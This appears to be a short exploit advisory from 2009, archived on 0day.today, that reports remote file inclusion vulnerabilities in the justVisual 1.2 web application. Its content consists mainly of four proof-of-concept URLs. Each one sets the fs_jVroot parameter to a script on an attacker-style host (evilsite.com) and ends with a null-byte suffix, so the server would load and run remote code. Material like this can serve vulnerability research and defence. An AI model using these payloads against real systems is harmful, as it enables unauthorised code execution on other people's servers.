id: 5577
date: 07/29/2009
title: justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
author: SirGod
cves: 

================================================================
justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
================================================================


##################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

 - Vulnerable code is everywhere

 - PoC's

   http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

##################################################################################################################




#  0day.today [2023-03-26]  #